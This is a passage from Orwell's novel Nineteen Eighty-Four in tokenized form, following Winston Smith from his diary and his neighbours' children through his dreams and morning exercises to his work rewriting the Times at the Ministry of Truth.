And it was no longer the same cramped , awkward handwriting as before .
His pen had slid voluptuously over the smooth paper , printing in large neat capitals —
DOWN WITH BIG BROTHER
DOWN WITH BIG BROTHER
DOWN WITH BIG BROTHER
DOWN WITH BIG BROTHER
DOWN WITH BIG BROTHER
over and over again , filling half a page .
He could not help feeling a twinge of panic .
It was absurd , since the writing of those particular words was not more dangerous than the initial act of opening the diary , but for a moment he was tempted to tear out the spoiled pages and abandon the enterprise altogether .
He did not do so , however , because he knew that it was useless .
Whether he wrote DOWN WITH BIG BROTHER , or whether he refrained from writing it , made no difference .
Whether he went on with the diary , or whether he did not go on with it , made no difference .
The Thought Police would get him just the same .
He had committed — would still have committed , even if he had never set pen to paper — the essential crime that contained all others in itself .
Thoughtcrime , they called it .
Thoughtcrime was not a thing that could be concealed for ever .
You might dodge successfully for a while , even for years , but sooner or later they were bound to get you .
It was always at night — the arrests invariably happened at night .
The sudden jerk out of sleep , the rough hand shaking your shoulder , the lights glaring in your eyes , the ring of hard faces round the bed .
In the vast majority of cases there was no trial , no report of the arrest .
People simply disappeared , always during the night .
Your name was removed from the registers , every record of everything you had ever done was wiped out , your one - time existence was denied and then forgotten .
You were abolished , annihilated : vapourized was the usual word .
For a moment he was seized by a kind of hysteria .
He began writing in a hurried untidy scrawl :
theyll shoot me i do n't care theyll shoot me in the back of the neck i dont care down with big brother they always shoot you in the back of the neck i dont care down with big brother —
He sat back in his chair , slightly ashamed of himself , and laid down the pen .
The next moment he started violently .
There was a knocking at the door .
Already !
He sat as still as a mouse , in the futile hope that whoever it was might go away after a single attempt .
But no , the knocking was repeated .
The worst thing of all would be to delay .
His heart was thumping like a drum , but his face , from long habit , was probably expressionless .
He got up and moved heavily towards the door .
As he put his hand to the door - knob Winston saw that he had left the diary open on the table .
DOWN WITH BIG BROTHER was written all over it , in letters almost big enough to be legible across the room .
It was an inconceivably stupid thing to have done .
But , he realized , even in his panic he had not wanted to smudge the creamy paper by shutting the book while the ink was wet .
He drew in his breath and opened the door .
Instantly a warm wave of relief flowed through him .
A colourless , crushed - looking woman , with wispy hair and a lined face , was standing outside .
‘ Oh , comrade , ’ she began in a dreary , whining sort of voice , ‘ I thought I heard you come in .
Do you think you could come across and have a look at our kitchen sink ?
It 's got blocked up and — ’
It was Mrs. Parsons , the wife of a neighbour on the same floor .
( ‘ Mrs. ’ was a word somewhat discountenanced by the Party — you were supposed to call everyone ‘ comrade ’ — but with some women one used it instinctively . )
She was a woman of about thirty , but looking much older .
One had the impression that there was dust in the creases of her face .
Winston followed her down the passage .
These amateur repair jobs were an almost daily irritation .
Victory Mansions were old flats , built in 1930 or thereabouts , and were falling to pieces .
The plaster flaked constantly from ceilings and walls , the pipes burst in every hard frost , the roof leaked whenever there was snow , the heating system was usually running at half steam when it was not closed down altogether from motives of economy .
Repairs , except what you could do for yourself , had to be sanctioned by remote committees which were liable to hold up even the mending of a window - pane for two years .
‘ Of course it 's only because Tom is n't home , ’ said Mrs. Parsons vaguely .
The Parsons ” flat was bigger than Winston's , and dingy in a different way .
Everything had a battered , trampled - on look , as though the place had just been visited by some large violent animal .
Games impedimenta — hockey - sticks , boxing - gloves , a burst football , a pair of sweaty shorts turned inside out — lay all over the floor , and on the table there was a litter of dirty dishes and dog - eared exercise - books .
On the walls were scarlet banners of the Youth League and the Spies , and a full - sized poster of Big Brother .
There was the usual boiled - cabbage smell , common to the whole building , but it was shot through by a sharper reek of sweat , which — one knew this at the first sniff , though it was hard to say how — was the sweat of some person not present at the moment .
In another room someone with a comb and a piece of toilet paper was trying to keep tune with the military music which was still issuing from the telescreen .
‘ It 's the children , ’ said Mrs. Parsons , casting a half - apprehensive glance at the door .
‘ They have n't been out today .
And of course — ’
She had a habit of breaking off her sentences in the middle .
The kitchen sink was full nearly to the brim with filthy greenish water which smelt worse than ever of cabbage .
Winston knelt down and examined the angle - joint of the pipe .
He hated using his hands , and he hated bending down , which was always liable to start him coughing .
Mrs. Parsons looked on helplessly .
‘ Of course if Tom was home he'd put it right in a moment , ’ she said .
‘ He loves anything like that .
He 's ever so good with his hands , Tom is . ’
Parsons was Winston 's fellow - employee at the Ministry of Truth .
He was a fattish but active man of paralysing stupidity , a mass of imbecile enthusiasms — one of those completely unquestioning , devoted drudges on whom , more even than on the Thought Police , the stability of the Party depended .
At thirty - five he had just been unwillingly evicted from the Youth League , and before graduating into the Youth League he had managed to stay on in the Spies for a year beyond the statutory age .
At the Ministry he was employed in some subordinate post for which intelligence was not required , but on the other hand he was a leading figure on the Sports Committee and all the other committees engaged in organizing community hikes , spontaneous demonstrations , savings campaigns , and voluntary activities generally .
He would inform you with quiet pride , between whiffs of his pipe , that he had put in an appearance at the Community Centre every evening for the past four years .
An overpowering smell of sweat , a sort of unconscious testimony to the strenuousness of his life , followed him about wherever he went , and even remained behind him after he had gone .
‘ Have you got a spanner ? ’ said Winston , fiddling with the nut on the angle - joint .
‘ A spanner , ’ said Mrs. Parsons , immediately becoming invertebrate .
‘ I do n't know , I 'm sure .
Perhaps the children — ’
There was a trampling of boots and another blast on the comb as the children charged into the living - room .
Mrs. Parsons brought the spanner .
Winston let out the water and disgustedly removed the clot of human hair that had blocked up the pipe .
He cleaned his fingers as best he could in the cold water from the tap and went back into the other room .
‘ Up with your hands ! ’ yelled a savage voice .
A handsome , tough - looking boy of nine had popped up from behind the table and was menacing him with a toy automatic pistol , while his small sister , about two years younger , made the same gesture with a fragment of wood .
Both of them were dressed in the blue shorts , grey shirts , and red neckerchiefs which were the uniform of the Spies .
Winston raised his hands above his head , but with an uneasy feeling , so vicious was the boy 's demeanour , that it was not altogether a game .
‘ You 're a traitor ! ’ yelled the boy .
‘ You 're a thought - criminal !
You 're a Eurasian spy !
I 'll shoot you , I 'll vaporize you , I 'll send you to the salt mines ! ’
Suddenly they were both leaping round him , shouting ‘ Traitor ! ’ and ‘ Thought - criminal ! ’ the little girl imitating her brother in every movement .
It was somehow slightly frightening , like the gambolling of tiger cubs which will soon grow up into man-eaters .
There was a sort of calculating ferocity in the boy 's eye , a quite evident desire to hit or kick Winston and a consciousness of being very nearly big enough to do so .
It was a good job it was not a real pistol he was holding , Winston thought .
Mrs. Parsons ” eyes flitted nervously from Winston to the children , and back again .
In the better light of the living - room he noticed with interest that there actually was dust in the creases of her face .
‘ They do get so noisy , ’ she said .
‘ They 're disappointed because they could n't go to see the hanging , that 's what it is .
I 'm too busy to take them .
and Tom wo n't be back from work in time . ’
‘ Why ca n't we go and see the hanging ? ’ roared the boy in his huge voice .
‘ Want to see the hanging !
Want to see the hanging !’ chanted the little girl , still capering round .
Some Eurasian prisoners , guilty of war crimes , were to be hanged in the Park that evening , Winston remembered .
This happened about once a month , and was a popular spectacle .
Children always clamoured to be taken to see it .
He took his leave of Mrs. Parsons and made for the door .
But he had not gone six steps down the passage when something hit the back of his neck an agonizingly painful blow .
It was as though a red - hot wire had been jabbed into him .
He spun round just in time to see Mrs. Parsons dragging her son back into the doorway while the boy pocketed a catapult .
‘ Goldstein ! ’ bellowed the boy as the door closed on him .
But what most struck Winston was the look of helpless fright on the woman 's greyish face .
Back in the flat he stepped quickly past the telescreen and sat down at the table again , still rubbing his neck .
The music from the telescreen had stopped .
Instead , a clipped military voice was reading out , with a sort of brutal relish , a description of the armaments of the new Floating Fortress which had just been anchored between lceland and the Faroe lslands .
With those children , he thought , that wretched woman must lead a life of terror .
Another year , two years , and they would be watching her night and day for symptoms of unorthodoxy .
Nearly all children nowadays were horrible .
What was worst of all was that by means of such organizations as the Spies they were systematically turned into ungovernable little savages , and yet this produced in them no tendency whatever to rebel against the discipline of the Party .
On the contrary , they adored the Party and everything connected with it .
The songs , the processions , the banners , the hiking , the drilling with dummy rifles , the yelling of slogans , the worship of Big Brother — it was all a sort of glorious game to them .
All their ferocity was turned outwards , against the enemies of the State , against foreigners , traitors , saboteurs , thought - criminals .
It was almost normal for people over thirty to be frightened of their own children .
And with good reason , for hardly a week passed in which the Times did not carry a paragraph describing how some eavesdropping little sneak — ‘ child hero ’ was the phrase generally used — had overheard some compromising remark and denounced its parents to the Thought Police .
The sting of the catapult bullet had worn off .
He picked up his pen half - heartedly , wondering whether he could find something more to write in the diary .
Suddenly he began thinking of O'Brien again .
Years ago — how long was it ?
Seven years it must be — he had dreamed that he was walking through a pitch - dark room .
And someone sitting to one side of him had said as he passed : ‘ We shall meet in the place where there is no darkness . ’
It was said very quietly , almost casually — a statement , not a command .
He had walked on without pausing .
What was curious was that at the time , in the dream , the words had not made much impression on him .
It was only later and by degrees that they had seemed to take on significance .
He could not now remember whether it was before or after having the dream that he had seen O'Brien for the first time , nor could he remember when he had first identified the voice as O'Brien's .
But at any rate the identification existed .
It was O'Brien who had spoken to him out of the dark .
Winston had never been able to feel sure — even after this morning 's flash of the eyes it was still impossible to be sure whether O'Brien was a friend or an enemy .
Nor did it even seem to matter greatly .
There was a link of understanding between them , more important than affection or partisanship .
‘ We shall meet in the place where there is no darkness , ’ he had said .
Winston did not know what it meant , only that in some way or another it would come true .
The voice from the telescreen paused .
A trumpet call , clear and beautiful , floated into the stagnant air .
The voice continued raspingly :
‘ Attention !
Your attention , please !
A newsflash has this moment arrived from the Malabar front .
Our forces in South India have won a glorious victory .
I am authorized to say that the action we are now reporting may well bring the war within measurable distance of its end .
Here is the newsflash — ’
Bad news coming , thought Winston .
And sure enough , following on a gory description of the annihilation of a Eurasian army , with stupendous figures of killed and prisoners , came the announcement that , as from next week , the chocolate ration would be reduced from thirty grammes to twenty .
Winston belched again .
The gin was wearing off , leaving a deflated feeling .
The telescreen — perhaps to celebrate the victory , perhaps to drown the memory of the lost chocolate — crashed into ‘ Oceania , ' tis for thee ’ .
You were supposed to stand to attention .
However , in his present position he was invisible .
‘ Oceania , 'tis for thee ’ gave way to lighter music .
Winston walked over to the window , keeping his back to the telescreen .
The day was still cold and clear .
Somewhere far away a rocket bomb exploded with a dull , reverberating roar .
About twenty or thirty of them a week were falling on London at present .
Down in the street the wind flapped the torn poster to and fro , and the word INGSOC fitfully appeared and vanished .
Ingsoc .
The sacred principles of Ingsoc .
Newspeak , doublethink , the mutability of the past .
He felt as though he were wandering in the forests of the sea bottom , lost in a monstrous world where he himself was the monster .
He was alone .
The past was dead , the future was unimaginable .
What certainty had he that a single human creature now living was on his side ?
And what way of knowing that the dominion of the Party would not endure for ever ?
Like an answer , the three slogans on the white face of the Ministry of Truth came back to him :
WAR IS PEACE
FREEDOM IS SLAVERY
IGNORANCE IS STRENGTH
He took a twenty - five cent piece out of his pocket .
There , too , in tiny clear lettering , the same slogans were inscribed , and on the other face of the coin the head of Big Brother .
Even from the coin the eyes pursued you .
On coins , on stamps , on the covers of books , on banners , on posters , and on the wrappings of a cigarette packet — everywhere .
Always the eyes watching you and the voice enveloping you .
Asleep or awake , working or eating , indoors or out of doors , in the bath or in bed — no escape .
Nothing was your own except the few cubic centimetres inside your skull .
The sun had shifted round , and the myriad windows of the Ministry of Truth , with the light no longer shining on them , looked grim as the loopholes of a fortress .
His heart quailed before the enormous pyramidal shape .
It was too strong , it could not be stormed .
A thousand rocket bombs would not batter it down .
He wondered again for whom he was writing the diary .
For the future , for the past — for an age that might be imaginary .
And in front of him there lay not death but annihilation .
The diary would be reduced to ashes and himself to vapour .
Only the Thought Police would read what he had written , before they wiped it out of existence and out of memory .
How could you make appeal to the future when not a trace of you , not even an anonymous word scribbled on a piece of paper , could physically survive ?
The telescreen struck fourteen .
He must leave in ten minutes .
He had to be back at work by fourteen - thirty .
Curiously , the chiming of the hour seemed to have put new heart into him .
He was a lonely ghost uttering a truth that nobody would ever hear .
But so long as he uttered it , in some obscure way the continuity was not broken .
It was not by making yourself heard but by staying sane that you carried on the human heritage .
He went back to the table , dipped his pen , and wrote :
To the future or to the past , to a time when thought is free , when men are different from one another and do not live alone — to a time when truth exists and what is done cannot be undone :
From the age of uniformity , from the age of solitude , from the age of Big Brother , from the age of doublethink — greetings !
He was already dead , he reflected .
It seemed to him that it was only now , when he had begun to be able to formulate his thoughts , that he had taken the decisive step .
The consequences of every act are included in the act itself .
He wrote :
Thoughtcrime does not entail death : thoughtcrime IS death .
Now he had recognized himself as a dead man it became important to stay alive as long as possible .
Two fingers of his right hand were inkstained .
It was exactly the kind of detail that might betray you .
Some nosing zealot in the Ministry ( a woman , probably : someone like the little sandy - haired woman or the dark - haired girl from the Fiction Department ) might start wondering why he had been writing during the lunch interval , why he had used an old - fashioned pen , what he had been writing — and then drop a hint in the appropriate quarter .
He went to the bathroom and carefully scrubbed the ink away with the gritty dark - brown soap which rasped your skin like sandpaper and was therefore well adapted for this purpose .
He put the diary away in the drawer .
It was quite useless to think of hiding it , but he could at least make sure whether or not its existence had been discovered .
A hair laid across the page - ends was too obvious .
With the tip of his finger he picked up an identifiable grain of whitish dust and deposited it on the corner of the cover , where it was bound to be shaken off if the book was moved .
Winston was dreaming of his mother .
He must , he thought , have been ten or eleven years old when his mother had disappeared .
She was a tall , statuesque , rather silent woman with slow movements and magnificent fair hair .
His father he remembered more vaguely as dark and thin , dressed always in neat dark clothes ( Winston remembered especially the very thin soles of his father 's shoes ) and wearing spectacles .
The two of them must evidently have been swallowed up in one of the first great purges of the fifties .
At this moment his mother was sitting in some place deep down beneath him , with his young sister in her arms .
He did not remember his sister at all , except as a tiny , feeble baby , always silent , with large , watchful eyes .
Both of them were looking up at him .
They were down in some subterranean place — the bottom of a well , for instance , or a very deep grave — but it was a place which , already far below him , was itself moving downwards .
They were in the saloon of a sinking ship , looking up at him through the darkening water .
There was still air in the saloon , they could still see him and he them , but all the while they were sinking down , down into the green waters which in another moment must hide them from sight for ever .
He was out in the light and air while they were being sucked down to death , and they were down there because he was up here .
He knew it and they knew it , and he could see the knowledge in their faces .
There was no reproach either in their faces or in their hearts , only the knowledge that they must die in order that he might remain alive , and that this was part of the unavoidable order of things .
He could not remember what had happened , but he knew in his dream that in some way the lives of his mother and his sister had been sacrificed to his own .
It was one of those dreams which , while retaining the characteristic dream scenery , are a continuation of one 's intellectual life , and in which one becomes aware of facts and ideas which still seem new and valuable after one is awake .
The thing that now suddenly struck Winston was that his mother 's death , nearly thirty years ago , had been tragic and sorrowful in a way that was no longer possible .
Tragedy , he perceived , belonged to the ancient time , to a time when there was still privacy , love , and friendship , and when the members of a family stood by one another without needing to know the reason .
His mother 's memory tore at his heart because she had died loving him , when he was too young and selfish to love her in return , and because somehow , he did not remember how , she had sacrificed herself to a conception of loyalty that was private and unalterable .
Such things , he saw , could not happen today .
Today there were fear , hatred , and pain , but no dignity of emotion , no deep or complex sorrows .
All this he seemed to see in the large eyes of his mother and his sister , looking up at him through the green water , hundreds of fathoms down and still sinking .
Suddenly he was standing on short springy turf , on a summer evening when the slanting rays of the sun gilded the ground .
The landscape that he was looking at recurred so often in his dreams that he was never fully certain whether or not he had seen it in the real world .
In his waking thoughts he called it the Golden Country .
It was an old , rabbit - bitten pasture , with a foot - track wandering across it and a molehill here and there .
In the ragged hedge on the opposite side of the field the boughs of the elm trees were swaying very faintly in the breeze , their leaves just stirring in dense masses like women 's hair .
Somewhere near at hand , though out of sight , there was a clear , slow - moving stream where dace were swimming in the pools under the willow trees .
The girl with dark hair was coming towards them across the field .
With what seemed a single movement she tore off her clothes and flung them disdainfully aside .
Her body was white and smooth , but it aroused no desire in him , indeed he barely looked at it .
What overwhelmed him in that instant was admiration for the gesture with which she had thrown her clothes aside .
With its grace and carelessness it seemed to annihilate a whole culture , a whole system of thought , as though Big Brother and the Party and the Thought Police could all be swept into nothingness by a single splendid movement of the arm .
That too was a gesture belonging to the ancient time .
Winston woke up with the word ‘ Shakespeare ’ on his lips .
The telescreen was giving forth an ear - splitting whistle which continued on the same note for thirty seconds .
It was nought seven fifteen , getting - up time for office workers .
Winston wrenched his body out of bed — naked , for a member of the Outer Party received only 3,000 clothing coupons annually , and a suit of pyjamas was 600 — and seized a dingy singlet and a pair of shorts that were lying across a chair .
The Physical Jerks would begin in three minutes .
The next moment he was doubled up by a violent coughing fit which nearly always attacked him soon after waking up .
It emptied his lungs so completely that he could only begin breathing again by lying on his back and taking a series of deep gasps .
His veins had swelled with the effort of the cough , and the varicose ulcer had started itching .
‘ Thirty to forty group ! ’ yapped a piercing female voice .
‘ Thirty to forty group !
Take your places , please .
Thirties to forties !’
Winston sprang to attention in front of the telescreen , upon which the image of a youngish woman , scrawny but muscular , dressed in tunic and gym - shoes , had already appeared .
‘ Arms bending and stretching ! ’ she rapped out .
‘ Take your time by me .
One , two , three , four !
One , two , three , four !
Come on , comrades , put a bit of life into it !
One , two , three four !
One two , three , four !...’
The pain of the coughing fit had not quite driven out of Winston 's mind the impression made by his dream , and the rhythmic movements of the exercise restored it somewhat .
As he mechanically shot his arms back and forth , wearing on his face the look of grim enjoyment which was considered proper during the Physical Jerks , he was struggling to think his way backward into the dim period of his early childhood .
It was extraordinarily difficult .
Beyond the late fifties everything faded .
When there were no external records that you could refer to , even the outline of your own life lost its sharpness .
You remembered huge events which had quite probably not happened , you remembered the detail of incidents without being able to recapture their atmosphere , and there were long blank periods to which you could assign nothing .
Everything had been different then .
Even the names of countries , and their shapes on the map , had been different .
Airstrip
One , for instance , had not been so called in those days : it had been called England or Britain , though London , he felt fairly certain , had always been called London .
Winston could not definitely remember a time when his country had not been at war , but it was evident that there had been a fairly long interval of peace during his childhood , because one of his early memories was of an air raid which appeared to take everyone by surprise .
Perhaps it was the time when the atomic bomb had fallen on Colchester .
He did not remember the raid itself , but he did remember his father 's hand clutching his own as they hurried down , down , down into some place deep in the earth , round and round a spiral staircase which rang under his feet and which finally so wearied his legs that he began whimpering and they had to stop and rest .
His mother , in her slow , dreamy way , was following a long way behind them .
She was carrying his baby sister — or perhaps it was only a bundle of blankets that she was carrying : he was not certain whether his sister had been born then .
Finally they had emerged into a noisy , crowded place which he had realized to be a Tube station .
There were people sitting all over the stone - flagged floor , and other people , packed tightly together , were sitting on metal bunks , one above the other .
Winston and his mother and father found themselves a place on the floor , and near them an old man and an old woman were sitting side by side on a bunk .
The old man had on a decent dark suit and a black cloth cap pushed back from very white hair : his face was scarlet and his eyes were blue and full of tears .
He reeked of gin .
It seemed to breathe out of his skin in place of sweat , and one could have fancied that the tears welling from his eyes were pure gin .
But though slightly drunk he was also suffering under some grief that was genuine and unbearable .
In his childish way Winston grasped that some terrible thing , something that was beyond forgiveness and could never be remedied , had just happened .
It also seemed to him that he knew what it was .
Someone whom the old man loved — a little granddaughter , perhaps — had been killed .
Every few minutes the old man kept repeating :
‘ We did n't ought to 'ave trusted 'em .
I said so , Ma , did n't I ?
That 's what comes of trusting 'em .
I said so all along .
We did n't ought to 'ave trusted the buggers . ’
But which buggers they did n't ought to have trusted Winston could not now remember .
Since about that time , war had been literally continuous , though strictly speaking it had not always been the same war .
For several months during his childhood there had been confused street fighting in London itself , some of which he remembered vividly .
But to trace out the history of the whole period , to say who was fighting whom at any given moment , would have been utterly impossible , since no written record , and no spoken word , ever made mention of any other alignment than the existing one .
At this moment , for example , in 1984 ( if it was 1984 ) , Oceania was at war with Eurasia and in alliance with Eastasia .
In no public or private utterance was it ever admitted that the three powers had at any time been grouped along different lines .
Actually , as Winston well knew , it was only four years since Oceania had been at war with Eastasia and in alliance with Eurasia .
But that was merely a piece of furtive knowledge which he happened to possess because his memory was not satisfactorily under control .
Officially the change of partners had never happened .
Oceania was at war with Eurasia : therefore Oceania had always been at war with Eurasia .
The enemy of the moment always represented absolute evil , and it followed that any past or future agreement with him was impossible .
The frightening thing , he reflected for the ten thousandth time as he forced his shoulders painfully backward ( with hands on hips , they were gyrating their bodies from the waist , an exercise that was supposed to be good for the back muscles ) — the frightening thing was that it might all be true .
If the Party could thrust its hand into the past and say of this or that event , it never happened — that , surely , was more terrifying than mere torture and death ?
The Party said that Oceania had never been in alliance with Eurasia .
He , Winston Smith , knew that Oceania had been in alliance with Eurasia as short a time as four years ago .
But where did that knowledge exist ?
Only in his own consciousness , which in any case must soon be annihilated .
And if all others accepted the lie which the Party imposed — if all records told the same tale — then the lie passed into history and became truth .
‘ Who controls the past , ’ ran the Party slogan , ‘ controls the future : who controls the present controls the past . ’
And yet the past , though of its nature alterable , never had been altered .
Whatever was true now was true from everlasting to everlasting .
It was quite simple .
All that was needed was an unending series of victories over your own memory .
‘ Reality control ’ , they called it : in Newspeak , ‘ doublethink ’
‘ Stand easy ! ’ barked the instructress , a little more genially .
Winston sank his arms to his sides and slowly refilled his lungs with air .
His mind slid away into the labyrinthine world of doublethink .
To know and not to know , to be conscious of complete truthfulness while telling carefully constructed lies , to hold simultaneously two opinions which cancelled out , knowing them to be contradictory and believing in both of them , to use logic against logic , to repudiate morality while laying claim to it , to believe that democracy was impossible and that the Party was the guardian of democracy , to forget whatever it was necessary to forget , then to draw it back into memory again at the moment when it was needed , and then promptly to forget it again : and above all , to apply the same process to the process itself .
That was the ultimate subtlety : consciously to induce unconsciousness , and then , once again , to become unconscious of the act of hypnosis you had just performed .
Even to understand the word ‘ doublethink ’ involved the use of doublethink .
The instructress had called them to attention again .
‘ And now let 's see which of us can touch our toes ! ’ she said enthusiastically .
‘ Right over from the hips , please , comrades .
One - two !
One - two !... ’
Winston loathed this exercise , which sent shooting pains all the way from his heels to his buttocks and often ended by bringing on another coughing fit .
The half - pleasant quality went out of his meditations .
The past , he reflected , had not merely been altered , it had been actually destroyed .
For how could you establish even the most obvious fact when there existed no record outside your own memory ?
He tried to remember in what year he had first heard mention of Big Brother .
He thought it must have been at some time in the sixties , but it was impossible to be certain .
In the Party histories , of course , Big Brother figured as the leader and guardian of the Revolution since its very earliest days .
His exploits had been gradually pushed backwards in time until already they extended into the fabulous world of the forties and the thirties , when the capitalists in their strange cylindrical hats still rode through the streets of London in great gleaming motor - cars or horse carriages with glass sides .
There was no knowing how much of this legend was true and how much invented .
Winston could not even remember at what date the Party itself had come into existence .
He did not believe he had ever heard the word Ingsoc before 1960 , but it was possible that in its Oldspeak form — ‘ English Socialism ’ , that is to say — it had been current earlier .
Everything melted into mist .
Sometimes , indeed , you could put your finger on a definite lie .
It was not true , for example , as was claimed in the Party history books , that the Party had invented aeroplanes .
He remembered aeroplanes since his earliest childhood .
But you could prove nothing .
There was never any evidence .
Just once in his whole life he had held in his hands unmistakable documentary proof of the falsification of an historical fact .
And on that occasion —
‘ Smith ! ’ screamed the shrewish voice from the telescreen .
‘ 6079 Smith W.!
Yes , you !
Bend lower , please !
You can do better than that .
You 're not trying .
Lower , please !
That 's better , comrade .
Now stand at ease , the whole squad , and watch me . ’
A sudden hot sweat had broken out all over Winston 's body .
His face remained completely inscrutable .
Never show dismay !
Never show resentment !
A single flicker of the eyes could give you away .
He stood watching while the instructress raised her arms above her head and — one could not say gracefully , but with remarkable neatness and efficiency — bent over and tucked the first joint of her fingers under her toes .
‘ There , comrades !
That 's how I want to see you doing it .
Watch me again .
I 'm thirty - nine and I 've had four children .
Now look . ’
She bent over again .
‘ You see my knees are n't bent .
You can all do it if you want to , ’ she added as she straightened herself up .
‘ Anyone under forty - five is perfectly capable of touching his toes .
We do n't all have the privilege of fighting in the front line , but at least we can all keep fit .
Remember our boys on the Malabar front !
And the sailors in the Floating Fortresses !
Just think what they have to put up with .
Now try again .
That 's better , comrade , that 's much better , ’ she added encouragingly as Winston , with a violent lunge , succeeded in touching his toes with knees unbent , for the first time in several years .
With the deep , unconscious sigh which not even the nearness of the telescreen could prevent him from uttering when his day 's work started , Winston pulled the speakwrite towards him , blew the dust from its mouthpiece , and put on his spectacles .
Then he unrolled and clipped together four small cylinders of paper which had already flopped out of the pneumatic tube on the right - hand side of his desk .
In the walls of the cubicle there were three orifices .
To the right of the speakwrite , a small pneumatic tube for written messages , to the left , a larger one for newspapers ; and in the side wall , within easy reach of Winston 's arm , a large oblong slit protected by a wire grating .
This last was for the disposal of waste paper .
Similar slits existed in thousands or tens of thousands throughout the building , not only in every room but at short intervals in every corridor .
For some reason they were nicknamed memory holes .
When one knew that any document was due for destruction , or even when one saw a scrap of waste paper lying about , it was an automatic action to lift the flap of the nearest memory hole and drop it in , whereupon it would be whirled away on a current of warm air to the enormous furnaces which were hidden somewhere in the recesses of the building .
Winston examined the four slips of paper which he had unrolled .
Each contained a message of only one or two lines , in the abbreviated jargon — not actually Newspeak , but consisting largely of Newspeak words — which was used in the Ministry for internal purposes .
They ran :
times 17.3.84 bb speech malreported africa rectify times 19.12.83 forecasts 3 yp 4th quarter 83 misprints verify current issue times 14.2.84 miniplenty malquoted chocolate rectify times 3.12.83 reporting bb dayorder doubleplusungood refs unpersons rewrite fullwise upsub antefiling
With a faint feeling of satisfaction Winston laid the fourth message aside .
It was an intricate and responsible job and had better be dealt with last .
The other three were routine matters , though the second one would probably mean some tedious wading through lists of figures .
Winston dialled ‘ back numbers ’ on the telescreen and called for the appropriate issues of the Times , which slid out of the pneumatic tube after only a few minutes ” delay .
The messages he had received referred to articles or news items which for one reason or another it was thought necessary to alter , or , as the official phrase had it , to rectify .
For example , it appeared from the Times of the seventeenth of March that Big Brother , in his speech of the previous day , had predicted that the South Indian front would remain quiet but that a Eurasian offensive would shortly be launched in North Africa .
As it happened , the Eurasian Higher Command had launched its offensive in South India and left North Africa alone .
It was therefore necessary to rewrite a paragraph of Big Brother 's speech , in such a way as to make him predict the thing that had actually happened .
Or again , the Times of the nineteenth of December had published the official forecasts of the output of various classes of consumption goods in the fourth quarter of 1983 , which was also the sixth quarter of the Ninth Three - Year Plan .
Today 's issue contained a statement of the actual output , from which it appeared that the forecasts were in every instance grossly wrong .
Winston 's job was to rectify the original figures by making them agree with the later ones .
As for the third message , it referred to a very simple error which could be set right in a couple of minutes .
As short a time ago as February , the Ministry of Plenty had issued a promise ( a ‘ categorical pledge ’ were the official words ) that there would be no reduction of the chocolate ration during 1984 .
Actually , as Winston was aware , the chocolate ration was to be reduced from thirty grammes to twenty at the end of the present week .
All that was needed was to substitute for the original promise a warning that it would probably be necessary to reduce the ration at some time in April .
As soon as Winston had dealt with each of the messages , he clipped his speakwritten corrections to the appropriate copy of the Times and pushed them into the pneumatic tube .
Then , with a movement which was as nearly as possible unconscious , he crumpled up the original message and any notes that he himself had made , and dropped them into the memory hole to be devoured by the flames .
What happened in the unseen labyrinth to which the pneumatic tubes led , he did not know in detail , but he did know in general terms .
As soon as all the corrections which happened to be necessary in any particular number of the Times had been assembled and collated , that number would be reprinted , the original copy destroyed , and the corrected copy placed on the files in its stead .
This process of continuous alteration was applied not only to newspapers , but to books , periodicals , pamphlets , posters , leaflets , films , sound - tracks , cartoons , photographs — to every kind of literature or documentation which might conceivably hold any political or ideological significance .
Day by day and almost minute by minute the past was brought up to date .
In this way every prediction made by the Party could be shown by documentary evidence to have been correct , nor was any item of news , or any expression of opinion , which conflicted with the needs of the moment , ever allowed to remain on record .
All history was a palimpsest , scraped clean and reinscribed exactly as often as was necessary .
In no case would it have been possible , once the deed was done , to prove that any falsification had taken place .
The largest section of the Records Department , far larger than the one on which Winston worked , consisted simply of persons whose duty it was to track down and collect all copies of books , newspapers , and other documents which had been superseded and were due for destruction .
A number of the Times which might , because of changes in political alignment , or mistaken prophecies uttered by Big Brother , have been rewritten a dozen times still stood on the files bearing its original date , and no other copy existed to contradict it .
Books , also , were recalled and rewritten again and again , and were invariably reissued without any admission that any alteration had been made .
Even the written instructions which Winston received , and which he invariably got rid of as soon as he had dealt with them , never stated or implied that an act of forgery was to be committed : always the reference was to slips , errors , misprints , or misquotations which it was necessary to put right in the interests of accuracy .
But actually , he thought as he re-adjusted the Ministry of Plenty 's figures , it was not even forgery .
It was merely the substitution of one piece of nonsense for another .
Most of the material that you were dealing with had no connexion with anything in the real world , not even the kind of connexion that is contained in a direct lie .
Statistics were just as much a fantasy in their original version as in their rectified version .
A great deal of the time you were expected to make them up out of your head .
For example , the Ministry of Plenty 's forecast had estimated the output of boots for the quarter at 145 million pairs .
The actual output was given as sixty - two millions .
Winston , however , in rewriting the forecast , marked the figure down to fifty - seven millions , so as to allow for the usual claim that the quota had been overfulfilled .
In any case , sixty - two millions was no nearer the truth than fifty - seven millions , or than 145 millions .
Very likely no boots had been produced at all .
Likelier still , nobody knew how many had been produced , much less cared .
All one knew was that every quarter astronomical numbers of boots were produced on paper , while perhaps half the population of Oceania went barefoot .
And so it was with every class of recorded fact , great or small .
Everything faded away into a shadow - world in which , finally , even the date of the year had become uncertain .
Winston glanced across the hall .
In the corresponding cubicle on the other side a small , precise - looking , dark - chinned man named Tillotson was working steadily away , with a folded newspaper on his knee and his mouth very close to the mouthpiece of the speakwrite .
He had the air of trying to keep what he was saying a secret between himself and the telescreen .
He looked up , and his spectacles darted a hostile flash in Winston 's direction .
Winston hardly knew Tillotson , and had no idea what work he was employed on .
People in the Records Department did not readily talk about their jobs .
In the long , windowless hall , with its double row of cubicles and its endless rustle of papers and hum of voices murmuring into speakwrites , there were quite a dozen people whom Winston did not even know by name , though he daily saw them hurrying to and fro in the corridors or gesticulating in the Two Minutes Hate .
He knew that in the cubicle next to him the little woman with sandy hair toiled day in day out , simply at tracking down and deleting from the Press the names of people who had been vaporized and were therefore considered never to have existed .
There was a certain fitness in this , since her own husband had been vaporized a couple of years earlier .
And a few cubicles away a mild , ineffectual , dreamy creature named Ampleforth , with very hairy ears and a surprising talent for juggling with rhymes and metres , was engaged in producing garbled versions — definitive texts , they were called — of poems which had become ideologically offensive , but which for one reason or another were to be retained in the anthologies .
And this hall , with its fifty workers or thereabouts , was only one sub-section , a single cell , as it were , in the huge complexity of the Records Department .
Beyond , above , below , were other swarms of workers engaged in an unimaginable multitude of jobs .
There were the huge printing - shops with their sub-editors , their typography experts , and their elaborately equipped studios for the faking of photographs .
There was the tele - programmes section with its engineers , its producers , and its teams of actors specially chosen for their skill in imitating voices .
